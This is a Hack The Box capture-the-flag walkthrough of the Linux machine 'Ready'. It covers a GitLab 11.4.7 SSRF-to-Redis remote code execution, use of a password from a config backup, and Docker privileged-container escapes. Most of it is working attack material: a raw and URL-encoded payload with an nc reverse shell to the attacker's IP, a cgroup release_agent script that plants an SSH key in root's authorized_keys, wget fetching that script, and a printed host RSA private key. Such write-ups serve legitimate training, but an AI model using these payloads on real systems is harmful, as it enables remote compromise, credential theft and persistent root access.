Hack-The-Box-walkthrough[ready]

Posted on Edited on In Views: Word count in article: 1.6k Reading time ≈ 6 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 12 Dec 2020
IP: 10.10.10.220

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.220
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
5080/tcp open  http    nginx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So basically Two ports are opened 22:ssh 5080:http

Port-80

There is a simple Gitlab Sign in page.

Let’s register ourself.

And we got login

After some enumeration i found an interesting thing.

There is a gitlab version and a interesting thing “update asap” in red background that semms to be vulnerable.

After some googling i found an interesting article of liveoverflow.

  • GitLab 11.4.7 Remote Code Execution

suggest you to watch this vedio for better Understanding.

  • GitLab 11.4.7 Remote Code Execution - Real World CTF 2018

After reading the article and watch the full vedio i understand that we got the reverse shell through this method which he show in the vedio.

Let’s try this real quick.

Step 1

Click on new project.

Now click on Import project.

Click repo-by-url

Step 2

Now we need to use the payload with url encode it that showing in the vedio.

1
2
3
4
5
6
7
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 10.10.14.2 9001 -e /bin/bash \').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git

Now url encode the payload

1
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%2010%2E10%2E14%2E2%209001%20%2de%20%2fbin%2fbash%20%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git

Now add this payload inside the Git-repository-URL feild.

Before click on the Create Project start your netcat listner on 9001.

Now click on Create project.

Let’s check our netcat listner.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:37142.
id
uid=998(git) gid=998(git) groups=998(git)
whoami
git
python -c 'import pty; pty.spawn("/bin/bash")'
id
uid=998(git) gid=998(git) groups=998(git)
whoami
git
python3 -c 'import pty; pty.spawn("/bin/bash")'
git@gitlab:~/gitlab-rails/working$ id
id
uid=998(git) gid=998(git) groups=998(git)
git@gitlab:~/gitlab-rails/working$ whoami
whoami
git

Boom we got thereverse shell as git.

We are inside a docker container.

Now after some enumeration i found an interesting file called gitlab.rb inside /opt/backup directory.

1
2
3
git@gitlab:/opt/backup$ ls
ls
docker-compose.yml  gitlab-secrets.json  gitlab.rb

After see the content in the file i found a password:

1
2
3
4
5
git@gitlab:/opt/backup$ cat gitlab.rb | grep password
cat gitlab.rb | grep password
...
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
...

Let’s change our user real quick.

1
2
3
4
5
6
7
8
9
su
Password: wW59U!ZKMbG9+*#h

root@gitlab:/opt/backup# id
id
uid=0(root) gid=0(root) groups=0(root)
root@gitlab:/opt/backup# whoami
whoami
root

And we are root in the docker container

now we can see the content of user.txt file.

1
2
3
4
5
6
root@gitlab:~# find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/dude/user.txt
root@gitlab:~# cat /home/dude/user.txt
cat /home/dude/user.txt
e1e30b052b6ec0670698805d745e7682

Privilege-escalation-way1

After some enumeration i found nothing for privesc.

Now i search on google for privilege-escalation inside docker container and i found an interesting article.

  • Escaping Docker Privileged Containers

After reading the article i got the ruff idea how to privesc.

Step 1

First we need to create our ssh public key.

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# cat /root/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali

Step 2

Now we need to create a file called root.sh.

Change your id_rsa.pub file content inside root.sh.

root.sh:

1
2
3
4
5
6
7
8
9
mkdir /tmp/luci12 && mount -t cgroup -o rdma cgroup /tmp/luci12 && mkdir /tmp/luci12/xx
echo 1 > /tmp/luci12/xx/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/luci12/release_agent

echo '#!/bin/sh' > /cmd
echo "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali' > /root/.ssh/authorized_keys" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/luci12/xx/cgroup.procs"

Step 3

Open your Python SimpleHttpServer.

And send the file on docker container.

1
2
3
4
┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.220 - - [16/Dec/2020 05:08:03] "GET /root.sh HTTP/1.1" 200 -
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@gitlab:~# cd /tmp                                                                                                                         
cd /tmp                                                                                                                                        
root@gitlab:/tmp# ls                                                                                                                           
ls                                                                                                                                             
gitaly-ruby896015435                                                                                                                           
root@gitlab:/tmp# wget http://10.10.14.2/root.sh                                                                                               
wget http://10.10.14.2/root.sh                                                                                                                 
--2020-12-16 10:11:41--  http://10.10.14.2/root.sh                                                                                             
Connecting to 10.10.14.2:80... connected.                                                                                                      
HTTP request sent, awaiting response... 200 OK                                                                                                 
Length: 375 [text/x-sh]
Saving to: 'root.sh'

root.sh             100%[===================>]     375  --.-KB/s    in 0s      

2020-12-16 10:11:41 (46.7 MB/s) - 'root.sh' saved [375/375]

root@gitlab:/tmp# chmod 777 *
chmod 777 *
root@gitlab:/tmp# ./root.sh
./root.sh

now we can use id_rsa to ssh into the target:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# ssh -i id_rsa root@10.10.10.220
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 16 Dec 2020 10:33:53 AM UTC

  System load:                      0.1
  Usage of /:                       65.2% of 17.59GB
  Memory usage:                     78%
  Swap usage:                       0%
  Processes:                        333
  Users logged in:                  0
  IPv4 address for br-bcb73b090b3f: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens160:          10.10.10.220
  IPv6 address for ens160:          dead:beef::250:56ff:feb9:8278

  => There are 6 zombie processes.

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

170 updates can be installed immediately.
73 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun Dec 13 15:04:10 2020 from 10.10.14.5
root@ready:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ready:~# whoami
root
root@ready:~# ls
docker-gitlab  ready-channel  root.txt  snap
root@ready:~# cat root.txt
b7f98681505cd39066f67147b103c2b3

and we got the root flag

If you learn about more how this privesc work check this article.

  • Understanding Docker container escapes

Privilege-escalation-way2

We are inside container and we are root

Now i tried ‘new mount’ in container read it here

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
root@gitlab:/tmp# mkdir /tmp/test
mkdir /tmp/test
root@gitlab:/tmp# mount /dev/sda2 /tmp/test
mount /dev/sda2 /tmp/test
root@gitlab:/tmp# cat /tmp/test/root/.ssh/id_rsa
cat /tmp/test/root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAvyovfg++zswQT0s4YuKtqxOO6EhG38TR2eUaInSfI1rjH09Q
sle1ivGnwAUrroNAK48LE70Io13DIfE9rxcotDviAIhbBOaqMLbLnfnnCNLApjCn
6KkYjWv+9kj9shzPaN1tNQLc2Rg39pn1mteyvUi2pBfA4ItE05F58WpCgh9KNMlf
YmlPwjeRaqARlkkCgFcHFGyVxd6Rh4ZHNFjABd8JIl+Yaq/pg7t4qPhsiFsMwntX
TBKGe8T4lzyboBNHOh5yUAI3a3Dx3MdoY+qXS/qatKS2Qgh0Ram2LLFxib9hR49W
rG87jLNt/6s06z+Mwf7d/oN8SmCiJx3xHgFzbwIDAQABAoIBACeFZC4uuSbtv011
YqHm9TqSH5BcKPLoMO5YVA/dhmz7xErbzfYg9fJUxXaIWyCIGAMpXoPlJ90GbGof
Ar6pDgw8+RtdFVwtB/BsSipN2PrU/2kcVApgsyfBtQNb0b85/5NRe9tizR/Axwkf
iUxK3bQOTVwdYQ3LHR6US96iNj/KNru1E8WXcsii5F7JiNG8CNgQx3dzve3Jzw5+
lg5bKkywJcG1r4CU/XV7CJH2SEUTmtoEp5LpiA2Bmx9A2ep4AwNr7bd2sBr6x4ab
VYYvjQlf79/ANRXUUxMTJ6w4ov572Sp41gA9bmwI/Er2uLTVQ4OEbpLoXDUDC1Cu
K4ku7QECgYEA5G3RqH9ptsouNmg2H5xGZbG5oSpyYhFVsDad2E4y1BIZSxMayMXL
g7vSV+D/almaACHJgSIrBjY8ZhGMd+kbloPJLRKA9ob8rfxzUvPEWAW81vNqBBi2
3hO044mOPeiqsHM/+RQOW240EszoYKXKqOxzq/SK4bpRtjHsidSJo4ECgYEA1jzy
n20X43ybDMrxFdVDbaA8eo+og6zUqx8IlL7czpMBfzg5NLlYcjRa6Li6Sy8KNbE8
kRznKWApgLnzTkvupk/oYSijSliLHifiVkrtEY0nAtlbGlgmbwnW15lwV+d3Ixi1
KNwMyG+HHZqChNkFtXiyoFaDdNeuoTeAyyfwzu8CgYAo4L40ORjh7Sx38A4/eeff
Kv7dKItvoUqETkHRA6105ghAtxqD82GIIYRy1YDft0kn3OQCh+rLIcmNOna4vq6B
MPQ/bKBHfcCaIiNBJP5uAhjZHpZKRWH0O/KTBXq++XQSP42jNUOceQw4kRLEuOab
dDT/ALQZ0Q3uXODHiZFYAQKBgBBPEXU7e88QhEkkBdhQpNJqmVAHMZ/cf1ALi76v
DOYY4MtLf2dZGLeQ7r66mUvx58gQlvjBB4Pp0x7+iNwUAbXdbWZADrYxKV4BUUSa
bZOheC/KVhoaTcq0KAu/nYLDlxkv31Kd9ccoXlPNmFP+pWWcK5TzIQy7Aos5S2+r
ubQ3AoGBAIvvz5yYJBFJshQbVNY4vp55uzRbKZmlJDvy79MaRHdz+eHry97WhPOv
aKvV8jR1G+70v4GVye79Kk7TL5uWFDFWzVPwVID9QCYJjuDlLBaFDnUOYFZW52gz
vJzok/kcmwcBlGfmRKxlS0O6n9dAiOLY46YdjyS8F8hNPOKX6rCd
-----END RSA PRIVATE KEY-----

Now Login ssh using the readed id_rsa1 PRIVATE KEY

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(root💀kali)-[~/hackthebox/machine/ready]
└─# ssh -i id_rsa1 10.10.10.220
load pubkey "id_rsa1": invalid format
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 4.0

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

170 updates can be installed immediately.
73 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Dec 14 16:49:36 2020 from 10.10.14.33
root@ready:~# id && whoami && hostname
uid=0(root) gid=0(root) groups=0(root)
root
ready

Summary of knowledge

  • GitLab 11.4.7 Remote Code Execution
  • password disclosure in /opt/backup/gitlab.rb
  • Escaping Docker Privileged Containers to read id_rsa file

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…